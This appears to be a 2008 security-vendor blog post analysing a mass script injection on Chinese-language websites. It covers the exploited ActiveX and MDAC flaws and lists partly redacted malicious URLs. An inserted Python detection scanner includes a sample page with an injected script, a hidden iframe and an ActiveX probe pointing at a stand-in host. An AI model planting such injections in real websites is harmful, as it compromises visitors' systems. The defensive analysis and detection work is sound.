Just a week after half a million Web sites were compromised, here comes another mass Web threat — still no breathing easy for security researchers. Add to this that an even earlier SQL injection attack preceded the two just mentioned (a mere two days before the last one, and one which also targeted Chinese users), and we have a series of mass compromises in a span of just two weeks.
This time, we picked up on another script injection attack aimed at Web sites in the Chinese language. Here’s an illustrated summary of this mass compromise:

A visit to any compromised site would install and execute a malicious script on the visiting system. This script, which Trend Micro detects as JS_IFRAME.AC, may be downloaded from the remote site http://{BLOCKED}.us/s.js.
Here is a screenshot of the injected script in one of the compromised sites:

JS_IFRAME.AC then downloads JS_IFRAME.AD, which exploits several vulnerabilities to further insert scripts into Web sites. TrendLabs Threats Analyst Jonathan San Jose identifies the following exploit routines in JS_IFRAME.AD:
- Exploits a vulnerability in Microsoft Data Access Components (MDAC) MS06-14, which allows for remote code execution on an affected system
- Uses the import function IERPCtl.IERPCtl.1 or IERPPLUG.DLL to send the shellcode to an installed RealPlayer
- Checks for GLAVATAR.GLAvatarCtrl.1
- Exploits a BaoFeng2 Storm and MPS.StormPlayer.1 ActiveX control buffer overflow
- Takes advantage of an ActiveX control buffer overflow in Xunlei Thunder DapPlayer
Notice that the last two exploits are related to Chinese-language software, suggesting to our researchers that this malicious activity was targeted specifically at China, Taiwan, Singapore, and Hong Kong.
Exploiting these vulnerabilities causes JS_IFRAME.AD to redirect users to one of the following URLs:
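The two artifacts this post describes, an injected script tag pointing at a host the site never used, and script that instantiates the ActiveX ProgIDs named above, are both things a site owner can look for in their own pages. The following scanner is an added example written for this post, not code from Trend Micro or from the malware; it uses Python's standard-library HTML parser, treats every script or iframe whose host is outside an assumed allowlist (TRUSTED_HOSTS is a placeholder) as a finding, flags zero-sized iframes as a general heuristic, and flags inline script that calls ActiveXObject with one of the ProgIDs listed in the post. The sample page and the host evil-host.invalid are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# ProgIDs named in the post's analysis of JS_IFRAME.AD. Illustrative,
# not a complete signature set; compared case-insensitively because
# ProgIDs are not case-sensitive on Windows.
SUSPECT_PROGIDS = {
    "ierpctl.ierpctl.1",        # RealPlayer (IERPPLUG.DLL)
    "glavatar.glavatarctrl.1",
    "mps.stormplayer.1",        # BaoFeng Storm
}

# Hosts the site operator expects to serve script/frames from (assumed
# placeholder values; a real deployment would list its own CDN hosts).
TRUSTED_HOSTS = {"www.example.com", "static.example.com"}

# Matches new ActiveXObject("ProgID") / ActiveXObject('ProgID')
ACTIVEX_RE = re.compile(r'ActiveXObject\s*\(\s*["\']([^"\']+)["\']', re.I)


class _Collector(HTMLParser):
    """Collects script src values, iframe tags and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.iframes = []          # (src, attribute dict)
        self.inline_js = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "iframe":
            self.iframes.append((a.get("src") or "", a))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script content through handle_data unparsed
        if self._in_script and data.strip():
            self.inline_js.append(data)


def _host(url):
    """Hostname of an absolute or scheme-relative URL; '' for same-origin paths."""
    return (urlparse(url).hostname or "").lower()


def scan_html(html, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of (kind, detail) findings for one HTML document."""
    p = _Collector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.script_srcs:
        h = _host(src)
        if h and h not in trusted_hosts:
            findings.append(("external_script", src))
    for src, attrs in p.iframes:
        h = _host(src)
        if h and h not in trusted_hosts:
            findings.append(("external_iframe", src))
        # heuristic: a frame sized 0x0 exists only to load something unseen
        if attrs.get("width") == "0" or attrs.get("height") == "0":
            findings.append(("hidden_iframe", src))
    for js in p.inline_js:
        for progid in ACTIVEX_RE.findall(js):
            if progid.lower() in SUSPECT_PROGIDS:
                findings.append(("activex_progid", progid))
    return findings


# Constructed sample page: a clean site with one appended block of the
# kind the post describes (external script, hidden frame, ActiveX probe).
SAMPLE_PAGE = """<html><head><title>Constructed sample page</title>
<script src="/js/site.js"></script>
<script src="http://static.example.com/lib.js"></script>
</head><body><p>Welcome</p>
<script src="http://evil-host.invalid/s.js"></script>
<iframe src="http://evil-host.invalid/real.htm" width="0" height="0"></iframe>
<script>
  try { var o = new ActiveXObject("IERPCtl.IERPCtl.1"); } catch (e) {}
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:16} {detail}")
```

Relative and scheme-relative sources are handled by urlparse: "/js/site.js" has no host and is treated as same-origin, while "//evil-host.invalid/s.js" resolves to the external host. Running the scanner over a site's document root, or over pages fetched from it, gives the operator the same signal the post's Google count is based on, without depending on a search engine having indexed the page.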
- http://{BLOCKED}and.cn/real11.htm - detected as JS_REALPLAY.AT
- http://{BLOCKED}and.cn/real.htm - detected as JS_REALPLAY.CE
- http://{BLOCKED}and.cn/lz.htm - detected as JS_DLOADER.AP
- http://{BLOCKED}and.cn/bfyy.htm - detected as JS_DLOADER.GXS
- http://{BLOCKED}and.cn/14.htm - detected as JS_DLOADER.UOW
JS_IFRAME.AD was found to download the following:
- VBS_PSYME.CSZ
- JS_VEEMYFULL.AA
- JS_LIANZONG.E
- JS_SENGLOT.D
These four malware files, in turn, download and execute http://{BLOCKED}c.52gol.com/xx.exe, which is detected as TROJ_DLOADER.KQK.
As of this writing, Google search results show some 327,000 pages that contain the malicious script tag.

Trend Micro Web Threat Protection (WTP) has already blocked access to the said malicious URLs. Users are advised to be cautious when browsing Web sites. Critical software patches, once available from vendors, should be installed to ensure software security.
Our researchers are still investigating other details regarding this case. More information will be posted as soon as it becomes available. Trend Micro is also now trying to reach Taiwan CERT to inform them of this mass compromise.
Consolidated findings of the Research (Taiwan), Escalation, and Threat Response teams at TrendLabs.
Updated by Mayee Corpin and Jovi Umawing (Technical Communications)



May 20th, 2008 at 10:11 am
[...] is reporting massive web based SQL Injection attacks are now underway on the Chinese mainland, here. First reported by (thanks and a Tip O’ the Hat to Heise, by the way) Heise Security in the [...]
May 20th, 2008 at 11:40 pm
[...] We talked on XKOD about the attacks the Chinese government launched at other countries, compromising their networks, causing problems and accusations against China; now the tables have turned. [...]
May 21st, 2008 at 6:59 am
[...] speaking world. Its analysis - which includes graphics illustrating the attack - can be found here. Mass SQL injection hits English language websites | The Register [...]
May 21st, 2008 at 7:33 am
[...] Chinese Weekend Compromise. [...]
May 21st, 2008 at 12:43 pm
[...] Trend Micro says two exploits used in the latest SQL injection attacks are related to Chinese-language software, suggesting miscreants are specifically targeting the Chinese speaking world. Its analysis - which includes graphics illustrating the attack - can be found here. [...]
May 30th, 2008 at 5:37 pm
[...] of the vulnerability seems somewhat low, and not well discussed other than this blog entry, and one from Trend Micro - the HTML file ‘axlz.htm’ is identified as "Exploit:JS/Gdow.A" Incidentally, there are [...]